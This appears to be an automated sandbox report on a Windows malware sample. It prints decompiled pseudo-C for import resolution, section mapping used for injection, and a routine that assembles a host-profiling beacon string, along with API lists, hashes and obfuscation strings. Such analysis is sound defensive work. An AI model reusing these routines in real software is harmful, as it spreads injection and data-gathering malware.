                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00401264(void* __edi, intOrPtr _a4) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				intOrPtr* _v12;
                                                                                                                                  				_Unknown_base(*)()** _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed short _v24;
                                                                                                                                  				struct HINSTANCE__* _v28;
                                                                                                                                  				intOrPtr _t43;
                                                                                                                                  				intOrPtr* _t45;
                                                                                                                                  				intOrPtr _t46;
                                                                                                                                  				struct HINSTANCE__* _t47;
                                                                                                                                  				intOrPtr* _t49;
                                                                                                                                  				intOrPtr _t50;
                                                                                                                                  				signed short _t51;
                                                                                                                                  				_Unknown_base(*)()* _t53;
                                                                                                                                  				CHAR* _t54;
                                                                                                                                  				_Unknown_base(*)()* _t55;
                                                                                                                                  				void* _t58;
                                                                                                                                  				signed int _t59;
                                                                                                                                  				_Unknown_base(*)()* _t60;
                                                                                                                                  				intOrPtr _t61;
                                                                                                                                  				intOrPtr _t65;
                                                                                                                                  				signed int _t68;
                                                                                                                                  				void* _t69;
                                                                                                                                  				CHAR* _t71;
                                                                                                                                  				signed short* _t73;
                                                                                                                                  
                                                                                                                                  				_t69 = __edi;
                                                                                                                                  				_v20 = _v20 & 0x00000000;
                                                                                                                                  				_t59 =  *0x403100;
                                                                                                                                  				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                                                                                                                                  				if(_t43 != 0) {
                                                                                                                                  					_t45 = _t43 + __edi;
                                                                                                                                  					_v12 = _t45;
                                                                                                                                  					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                                  					if(_t46 != 0) {
                                                                                                                                  						while(1) {
                                                                                                                                  							_t71 = _t46 + _t69;
                                                                                                                                  							_t47 = LoadLibraryA(_t71); // executed
                                                                                                                                  							_v28 = _t47;
                                                                                                                                  							if(_t47 == 0) {
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							_v24 = _v24 & 0x00000000;
                                                                                                                                  							 *_t71 = _t59 - 0x69b25f44;
                                                                                                                                  							_t49 = _v12;
                                                                                                                                  							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                                                  							_t50 =  *_t49;
                                                                                                                                  							if(_t50 != 0) {
                                                                                                                                  								L6:
                                                                                                                                  								_t73 = _t50 + _t69;
                                                                                                                                  								_v16 = _t61 + _t69;
                                                                                                                                  								while(1) {
                                                                                                                                  									_t51 =  *_t73;
                                                                                                                                  									if(_t51 == 0) {
                                                                                                                                  										break;
                                                                                                                                  									}
                                                                                                                                  									if(__eflags < 0) {
                                                                                                                                  										__eflags = _t51 - _t69;
                                                                                                                                  										if(_t51 < _t69) {
                                                                                                                                  											L12:
                                                                                                                                  											_t21 =  &_v8;
                                                                                                                                  											 *_t21 = _v8 & 0x00000000;
                                                                                                                                  											__eflags =  *_t21;
                                                                                                                                  											_v24 =  *_t73 & 0x0000ffff;
                                                                                                                                  										} else {
                                                                                                                                  											_t65 = _a4;
                                                                                                                                  											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                                                                                  											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                                                                                  												goto L12;
                                                                                                                                  											} else {
                                                                                                                                  												goto L11;
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									} else {
                                                                                                                                  										_t51 = _t51 + _t69;
                                                                                                                                  										L11:
                                                                                                                                  										_v8 = _t51;
                                                                                                                                  									}
                                                                                                                                  									_t53 = _v8;
                                                                                                                                  									__eflags = _t53;
                                                                                                                                  									if(_t53 == 0) {
                                                                                                                                  										_t54 = _v24 & 0x0000ffff;
                                                                                                                                  									} else {
                                                                                                                                  										_t54 = _t53 + 2;
                                                                                                                                  									}
                                                                                                                                  									_t55 = GetProcAddress(_v28, _t54);
                                                                                                                                  									__eflags = _t55;
                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                  										_v20 = _t59 - 0x69b25ec5;
                                                                                                                                  									} else {
                                                                                                                                  										_t68 = _v8;
                                                                                                                                  										__eflags = _t68;
                                                                                                                                  										if(_t68 != 0) {
                                                                                                                                  											 *_t68 = _t59 - 0x69b25f44;
                                                                                                                                  										}
                                                                                                                                  										 *_v16 = _t55;
                                                                                                                                  										_t58 = 0x593682f4 + _t59 * 4;
                                                                                                                                  										_t73 = _t73 + _t58;
                                                                                                                                  										_t32 =  &_v16;
                                                                                                                                  										 *_t32 = _v16 + _t58;
                                                                                                                                  										__eflags =  *_t32;
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  									goto L23;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								_t50 = _t61;
                                                                                                                                  								if(_t61 != 0) {
                                                                                                                                  									goto L6;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							L23:
                                                                                                                                  							_v12 = _v12 + 0x14;
                                                                                                                                  							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                  							if(_t46 != 0) {
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  							}
                                                                                                                                  							L26:
                                                                                                                                  							goto L27;
                                                                                                                                  						}
                                                                                                                                  						_t60 = _t59 + 0x964da13a;
                                                                                                                                  						__eflags = _t60;
                                                                                                                                  						_v20 = _t60;
                                                                                                                                  						goto L26;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				L27:
                                                                                                                                  				return _v20;
                                                                                                                                   			}

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 0040129C
                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0040130E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp
                                                                                                                                   • Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                  • Opcode ID: b3be36541267bfaee00303300a6f938f46477752dc3d0cb2711c0485800f4ef2
                                                                                                                                  • Instruction ID: 08ebcf6dcd3e0bd4ed0640795f354858f0b5a52c81c2c864c780740fbe29bbaa
                                                                                                                                  • Opcode Fuzzy Hash: b3be36541267bfaee00303300a6f938f46477752dc3d0cb2711c0485800f4ef2
                                                                                                                                  • Instruction Fuzzy Hash: 74312771A002069BDB14CF99C894AAEB7F4BF08354B1440BED901FB3A0E778EA41CB59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E00401703(void** __esi, PVOID* _a4) {
                                                                                                                                  				long _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				long _t13;
                                                                                                                                  
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                                  				if(_t13 < 0) {
                                                                                                                                  					_push(_t13);
                                                                                                                                  					return __esi[6]();
                                                                                                                                  				}
                                                                                                                                  				return 0;
                                                                                                                                   			}

                                                                                                                                  APIs
                                                                                                                                  • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401D02,00000002,00000000,?,?,00000000,?,?,00401D02,00000002), ref: 00401730
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp
                                                                                                                                   • Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SectionView
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1323581903-0
                                                                                                                                  • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                  • Instruction ID: 5d5daab65626f5a8b20b58ce6b1aa041d559c67da48c763f4c54447031275def
                                                                                                                                  • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                  • Instruction Fuzzy Hash: 10F037B590020CFFDB119FA5CC85CAFBBBDEB44394B10493AF152E20A0D6309E499B61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 66%
                                                                                                                                  			E022B9BF1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
                                                                                                                                  				intOrPtr _v0;
                                                                                                                                  				intOrPtr _v4;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				void* _v44;
                                                                                                                                  				intOrPtr _v52;
                                                                                                                                  				void* __edi;
                                                                                                                                  				long _t25;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				intOrPtr _t27;
                                                                                                                                  				intOrPtr _t28;
                                                                                                                                  				intOrPtr _t29;
                                                                                                                                  				intOrPtr _t30;
                                                                                                                                  				void* _t33;
                                                                                                                                  				intOrPtr _t34;
                                                                                                                                  				int _t37;
                                                                                                                                  				void* _t38;
                                                                                                                                  				intOrPtr _t42;
                                                                                                                                  				intOrPtr _t43;
                                                                                                                                  				intOrPtr _t50;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  				intOrPtr* _t56;
                                                                                                                                  				intOrPtr _t62;
                                                                                                                                  				intOrPtr _t68;
                                                                                                                                  				intOrPtr _t71;
                                                                                                                                  				intOrPtr _t74;
                                                                                                                                  				int _t77;
                                                                                                                                  				intOrPtr _t78;
                                                                                                                                  				int _t81;
                                                                                                                                  				intOrPtr _t83;
                                                                                                                                  				int _t86;
                                                                                                                                  				intOrPtr* _t89;
                                                                                                                                  				intOrPtr* _t90;
                                                                                                                                  				void* _t91;
                                                                                                                                  				void* _t95;
                                                                                                                                  				void* _t96;
                                                                                                                                  				void* _t97;
                                                                                                                                  				intOrPtr _t98;
                                                                                                                                  				void* _t100;
                                                                                                                                  				int _t101;
                                                                                                                                  				void* _t102;
                                                                                                                                  				void* _t103;
                                                                                                                                  				void* _t105;
                                                                                                                                  				void* _t106;
                                                                                                                                  				void* _t108;
                                                                                                                                  
                                                                                                                                  				_t95 = __edx;
                                                                                                                                  				_t91 = __ecx;
                                                                                                                                  				_t25 = __eax;
                                                                                                                                  				_t105 = _a16;
                                                                                                                                  				_v4 = 8;
                                                                                                                                  				if(__eax == 0) {
                                                                                                                                  					_t25 = GetTickCount();
                                                                                                                                  				}
                                                                                                                                  				_t26 =  *0x22bd018; // 0x139c7884
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t27 =  *0x22bd014; // 0x3a87c8cd
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t28 =  *0x22bd010; // 0xd8d2f808
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t29 =  *0x22bd00c; // 0xeec43f25
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t30 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  				_t3 = _t30 + 0x22be633; // 0x74666f73
                                                                                                                                  				_t101 = wsprintfA(_t105, _t3, 2, 0x3d163, _t29, _t28, _t27, _t26,  *0x22bd02c,  *0x22bd004, _t25);
                                                                                                                                  				_t33 = E022B3288();
                                                                                                                                  				_t34 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  				_t4 = _t34 + 0x22be673; // 0x74707526
                                                                                                                                  				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                                                                                                  				_t108 = _t106 + 0x38;
                                                                                                                                  				_t102 = _t101 + _t37; // executed
                                                                                                                                  				_t38 = E022B831C(_t91); // executed
                                                                                                                                  				_t96 = _t38;
                                                                                                                                  				if(_t96 != 0) {
                                                                                                                                  					_t83 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  					_t6 = _t83 + 0x22be8d4; // 0x736e6426
                                                                                                                                  					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                                                                                                  					_t108 = _t108 + 0xc;
                                                                                                                                  					_t102 = _t102 + _t86;
                                                                                                                                  					HeapFree( *0x22bd238, 0, _t96);
                                                                                                                                  				}
                                                                                                                                  				_t97 = E022B9267();
                                                                                                                                  				if(_t97 != 0) {
                                                                                                                                  					_t78 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  					_t8 = _t78 + 0x22be8dc; // 0x6f687726
                                                                                                                                  					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                                                                                                  					_t108 = _t108 + 0xc;
                                                                                                                                  					_t102 = _t102 + _t81;
                                                                                                                                  					HeapFree( *0x22bd238, 0, _t97);
                                                                                                                                  				}
                                                                                                                                  				_t98 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  				_a32 = E022B284E(0x22bd00a, _t98 + 4);
                                                                                                                                  				_t42 =  *0x22bd2d0; // 0x0
                                                                                                                                  				if(_t42 != 0) {
                                                                                                                                  					_t74 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  					_t11 = _t74 + 0x22be8b6; // 0x3d736f26
                                                                                                                                  					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                                                                                                  					_t108 = _t108 + 0xc;
                                                                                                                                  					_t102 = _t102 + _t77;
                                                                                                                                  				}
                                                                                                                                  				_t43 =  *0x22bd2cc; // 0x0
                                                                                                                                  				if(_t43 != 0) {
                                                                                                                                  					_t71 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  					_t13 = _t71 + 0x22be88d; // 0x3d706926
                                                                                                                                  					wsprintfA(_t102 + _t105, _t13, _t43);
                                                                                                                                  				}
                                                                                                                                  				if(_a32 != 0) {
                                                                                                                                  					_t100 = RtlAllocateHeap( *0x22bd238, 0, 0x800);
                                                                                                                                  					if(_t100 != 0) {
                                                                                                                                  						E022B3239(GetTickCount());
                                                                                                                                  						_t50 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  						__imp__(_t50 + 0x40);
                                                                                                                                  						asm("lock xadd [eax], ecx");
                                                                                                                                  						_t54 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  						__imp__(_t54 + 0x40);
                                                                                                                                  						_t56 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  						_t103 = E022B7B8D(1, _t95, _t105,  *_t56);
                                                                                                                                  						asm("lock xadd [eax], ecx");
                                                                                                                                  						if(_t103 != 0) {
                                                                                                                                  							StrTrimA(_t103, 0x22bc28c);
                                                                                                                                  							_push(_t103);
                                                                                                                                  							_t62 = E022BA677();
                                                                                                                                  							_v16 = _t62;
                                                                                                                                  							if(_t62 != 0) {
                                                                                                                                  								_t89 = __imp__;
                                                                                                                                  								 *_t89(_t103, _v0);
                                                                                                                                  								 *_t89(_t100, _a4);
                                                                                                                                  								_t90 = __imp__;
                                                                                                                                  								 *_t90(_t100, _v28);
                                                                                                                                  								 *_t90(_t100, _t103);
                                                                                                                                  								_t68 = E022B933A(0xffffffffffffffff, _t100, _v28, _v24); // executed
                                                                                                                                  								_v52 = _t68;
                                                                                                                                  								if(_t68 != 0 && _t68 != 0x10d2) {
                                                                                                                                  									E022B5433();
                                                                                                                                  								}
                                                                                                                                  								HeapFree( *0x22bd238, 0, _v44);
                                                                                                                                  							}
                                                                                                                                  							RtlFreeHeap( *0x22bd238, 0, _t103); // executed
                                                                                                                                  						}
                                                                                                                                  						RtlFreeHeap( *0x22bd238, 0, _t100); // executed
                                                                                                                                  					}
                                                                                                                                  					HeapFree( *0x22bd238, 0, _a24);
                                                                                                                                  				}
                                                                                                                                  				RtlFreeHeap( *0x22bd238, 0, _t105); // executed
                                                                                                                                  				return _a4;
                                                                                                                                  			}
                                                                                                                                  0x022b9dc6
                                                                                                                                  0x022b9dcb
                                                                                                                                  0x022b9dd1
                                                                                                                                  0x022b9dd7
                                                                                                                                  0x022b9dde
                                                                                                                                  0x022b9de5
                                                                                                                                  0x022b9deb
                                                                                                                                  0x022b9df2
                                                                                                                                  0x022b9df6
                                                                                                                                  0x022b9e01
                                                                                                                                  0x022b9e06
                                                                                                                                  0x022b9e0c
                                                                                                                                  0x022b9e15
                                                                                                                                  0x022b9e15
                                                                                                                                  0x022b9e26
                                                                                                                                  0x022b9e26
                                                                                                                                  0x022b9e35
                                                                                                                                  0x022b9e35
                                                                                                                                  0x022b9e44
                                                                                                                                  0x022b9e44
                                                                                                                                  0x022b9e56
                                                                                                                                  0x022b9e56
                                                                                                                                  0x022b9e65
                                                                                                                                  0x022b9e76

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 022B9C08
                                                                                                                                  • wsprintfA.USER32 ref: 022B9C55
                                                                                                                                  • wsprintfA.USER32 ref: 022B9C72
                                                                                                                                  • wsprintfA.USER32 ref: 022B9C95
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 022B9CA5
                                                                                                                                  • wsprintfA.USER32 ref: 022B9CC7
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 022B9CD7
                                                                                                                                  • wsprintfA.USER32 ref: 022B9D0E
                                                                                                                                  • wsprintfA.USER32 ref: 022B9D2E
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 022B9D4B
                                                                                                                                  • GetTickCount.KERNEL32 ref: 022B9D5B
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(04779570), ref: 022B9D6F
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(04779570), ref: 022B9D8D
                                                                                                                                    • Part of subcall function 022B7B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,022B9DA0,?,047795B0), ref: 022B7BB8
                                                                                                                                    • Part of subcall function 022B7B8D: lstrlen.KERNEL32(?,?,?,022B9DA0,?,047795B0), ref: 022B7BC0
                                                                                                                                    • Part of subcall function 022B7B8D: strcpy.NTDLL ref: 022B7BD7
                                                                                                                                    • Part of subcall function 022B7B8D: lstrcat.KERNEL32(00000000,?), ref: 022B7BE2
                                                                                                                                    • Part of subcall function 022B7B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,022B9DA0,?,047795B0), ref: 022B7BFF
                                                                                                                                  • StrTrimA.SHLWAPI(00000000,022BC28C,?,047795B0), ref: 022B9DBF
                                                                                                                                    • Part of subcall function 022BA677: lstrlen.KERNEL32(04779BF8,00000000,00000000,7691C740,022B9DCB,00000000), ref: 022BA687
                                                                                                                                    • Part of subcall function 022BA677: lstrlen.KERNEL32(?), ref: 022BA68F
                                                                                                                                    • Part of subcall function 022BA677: lstrcpy.KERNEL32(00000000,04779BF8), ref: 022BA6A3
                                                                                                                                    • Part of subcall function 022BA677: lstrcat.KERNEL32(00000000,?), ref: 022BA6AE
                                                                                                                                  • lstrcpy.KERNEL32(00000000,?), ref: 022B9DDE
                                                                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 022B9DE5
                                                                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 022B9DF2
                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 022B9DF6
                                                                                                                                    • Part of subcall function 022B933A: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 022B93EC
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 022B9E26
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 022B9E35
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,047795B0), ref: 022B9E44
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 022B9E56
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?), ref: 022B9E65
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3080378247-8415677
                                                                                                                                  • Opcode ID: 227cf3743ec39c210eddf8a5f2d03232fa7eec4fe1d853547c93e7bb506da722
                                                                                                                                  • Instruction ID: d4a9829ebbca0b079d719b9c54c6666c2888b8453a311babdc79f479b5c94a18
                                                                                                                                  • Opcode Fuzzy Hash: 227cf3743ec39c210eddf8a5f2d03232fa7eec4fe1d853547c93e7bb506da722
                                                                                                                                  • Instruction Fuzzy Hash: 9261AA31D80241AFD713ABE4FC4CF9A7BA8EF48390F050915FA08C7261DB24E9658F21
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Strings
                                                                                                                                  • xisilumibuvetufonahuvemugeli tewafuvapiwiyuzotuvu fatejevohivo, xrefs: 0042F572
                                                                                                                                  • mikujukezicuharu, xrefs: 0042F61C
                                                                                                                                  • zetipabobutobawekicugi, xrefs: 0042F60D
                                                                                                                                  • furafizasuyesipebokevocejirijan, xrefs: 0042F617
                                                                                                                                  • pemahu, xrefs: 0042F1F9
                                                                                                                                  • Vefu mif kaxigija puhirege puwuf, xrefs: 0042F248
                                                                                                                                  • Hagavete buyihexinag remibumepupabo gojokekisila, xrefs: 0042F24D
                                                                                                                                  • 2Y?, xrefs: 0042F592
                                                                                                                                  • mecevituxe, xrefs: 0042F612
                                                                                                                                  • dunuviwujamenopigomareg, xrefs: 0042F2B7
                                                                                                                                  • \H, xrefs: 0042F51D
                                                                                                                                  • Regefiri, xrefs: 0042F252
                                                                                                                                  • ecucedidulola sedelalex zapexukigasu jihiwexogucup, xrefs: 0042F2C3
                                                                                                                                  • geceyuhocavanino goruyitozekitapopit, xrefs: 0042F2D9
                                                                                                                                  • zijiwe, xrefs: 0042F53E
                                                                                                                                  • Xegixaze, xrefs: 0042F2C8
                                                                                                                                  • iyeg xogahes yoxohavit jobikuz, xrefs: 0042F2BE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 2Y?$Hagavete buyihexinag remibumepupabo gojokekisila$Regefiri$Vefu mif kaxigija puhirege puwuf$Xegixaze$dunuviwujamenopigomareg$ecucedidulola sedelalex zapexukigasu jihiwexogucup$furafizasuyesipebokevocejirijan$geceyuhocavanino goruyitozekitapopit$iyeg xogahes yoxohavit jobikuz$mecevituxe$mikujukezicuharu$pemahu$xisilumibuvetufonahuvemugeli tewafuvapiwiyuzotuvu fatejevohivo$zetipabobutobawekicugi$zijiwe$\H
                                                                                                                                  • API String ID: 0-3330016514
                                                                                                                                  • Opcode ID: 846039d5df4024a12244b577df4387b1ca82c6556dfbf2ded9338e41f6ed5a34
                                                                                                                                  • Instruction ID: 51b13d8c1e7f4ee73c7fd78973e9ef6d82c99fdbf4cfe7d70cdb8559879fd166
                                                                                                                                  • Opcode Fuzzy Hash: 846039d5df4024a12244b577df4387b1ca82c6556dfbf2ded9338e41f6ed5a34
                                                                                                                                  • Instruction Fuzzy Hash: D4622C71144390BFE3209BA1EE4DFAF7BB8EB89B41F00452DF24AE50A0D7B45545CB6A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • xisilumibuvetufonahuvemugeli tewafuvapiwiyuzotuvu fatejevohivo, xrefs: 0042F572
                                                                                                                                  • mikujukezicuharu, xrefs: 0042F61C
                                                                                                                                  • zetipabobutobawekicugi, xrefs: 0042F60D
                                                                                                                                  • furafizasuyesipebokevocejirijan, xrefs: 0042F617
                                                                                                                                  • pemahu, xrefs: 0042F1F9
                                                                                                                                  • Vefu mif kaxigija puhirege puwuf, xrefs: 0042F248
                                                                                                                                  • Hagavete buyihexinag remibumepupabo gojokekisila, xrefs: 0042F24D
                                                                                                                                  • 2Y?, xrefs: 0042F592
                                                                                                                                  • mecevituxe, xrefs: 0042F612
                                                                                                                                  • dunuviwujamenopigomareg, xrefs: 0042F2B7
                                                                                                                                  • \H, xrefs: 0042F51D
                                                                                                                                  • Regefiri, xrefs: 0042F252
                                                                                                                                  • ecucedidulola sedelalex zapexukigasu jihiwexogucup, xrefs: 0042F2C3
                                                                                                                                  • geceyuhocavanino goruyitozekitapopit, xrefs: 0042F2D9
                                                                                                                                  • zijiwe, xrefs: 0042F53E
                                                                                                                                  • Xegixaze, xrefs: 0042F2C8
                                                                                                                                  • iyeg xogahes yoxohavit jobikuz, xrefs: 0042F2BE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset
                                                                                                                                  • String ID: 2Y?$Hagavete buyihexinag remibumepupabo gojokekisila$Regefiri$Vefu mif kaxigija puhirege puwuf$Xegixaze$dunuviwujamenopigomareg$ecucedidulola sedelalex zapexukigasu jihiwexogucup$furafizasuyesipebokevocejirijan$geceyuhocavanino goruyitozekitapopit$iyeg xogahes yoxohavit jobikuz$mecevituxe$mikujukezicuharu$pemahu$xisilumibuvetufonahuvemugeli tewafuvapiwiyuzotuvu fatejevohivo$zetipabobutobawekicugi$zijiwe$\H
                                                                                                                                  • API String ID: 2102423945-3330016514
                                                                                                                                  • Opcode ID: 4c9e2c1dd9026e5c4093277696a849a3cc7aeb5ea9774350c3b02a11d3877a8e
                                                                                                                                  • Instruction ID: 0df97d7b5a907e6a529e4a3b8104accf8c4749e539e08799282dbba88a821ffc
                                                                                                                                  • Opcode Fuzzy Hash: 4c9e2c1dd9026e5c4093277696a849a3cc7aeb5ea9774350c3b02a11d3877a8e
                                                                                                                                  • Instruction Fuzzy Hash: 45324F71249350BFE3209BA0EE49FDB7BA8EF89741F404529F34AE50A0D7B45544CBAE
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E022B7C3D(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				struct %anon52 _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				intOrPtr _v32;
                                                                                                                                  				union _LARGE_INTEGER _v36;
                                                                                                                                  				intOrPtr _v40;
                                                                                                                                  				void* _v44;
                                                                                                                                  				void _v88;
                                                                                                                                  				char _v92;
                                                                                                                                  				struct %anon52 _t46;
                                                                                                                                  				intOrPtr _t51;
                                                                                                                                  				long _t53;
                                                                                                                                  				void* _t54;
                                                                                                                                  				struct %anon52 _t60;
                                                                                                                                  				long _t64;
                                                                                                                                  				signed int _t65;
                                                                                                                                  				void* _t68;
                                                                                                                                  				void* _t70;
                                                                                                                                  				signed int _t71;
                                                                                                                                  				intOrPtr _t73;
                                                                                                                                  				intOrPtr _t76;
                                                                                                                                  				void** _t78;
                                                                                                                                  				void* _t80;
                                                                                                                                  
                                                                                                                                  				_t73 = __edx;
                                                                                                                                  				_v92 = 0;
                                                                                                                                  				memset( &_v88, 0, 0x2c);
                                                                                                                                  				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                                  				_v44 = _t46;
                                                                                                                                  				if(_t46 == 0) {
                                                                                                                                  					_v8.LowPart = GetLastError();
                                                                                                                                  				} else {
                                                                                                                                  					_push(0xffffffff);
                                                                                                                                  					_push(0xff676980);
                                                                                                                                  					_push(0);
                                                                                                                                  					_push( *0x22bd240);
                                                                                                                                  					_v20 = 0;
                                                                                                                                  					_v16 = 0;
                                                                                                                                  					L022BAF6E();
                                                                                                                                  					_v36.LowPart = _t46;
                                                                                                                                  					_v32 = _t73;
                                                                                                                                  					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                                                                  					_t51 =  *0x22bd26c; // 0x1ac
                                                                                                                                  					_v40 = _t51;
                                                                                                                                  					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                  					_v8.LowPart = _t53;
                                                                                                                                  					if(_t53 == 0) {
                                                                                                                                  						if(_a8 != 0) {
                                                                                                                                  							L4:
                                                                                                                                  							 *0x22bd24c = 5;
                                                                                                                                  						} else {
                                                                                                                                  							_t68 = E022B5319(_t73); // executed
                                                                                                                                  							if(_t68 != 0) {
                                                                                                                                  								goto L4;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_v12 = 0;
                                                                                                                                  						L6:
                                                                                                                                  						if(_v12 == 1 && ( *0x22bd260 & 0x00000001) == 0) {
                                                                                                                                  							_v12 = 2;
                                                                                                                                  						}
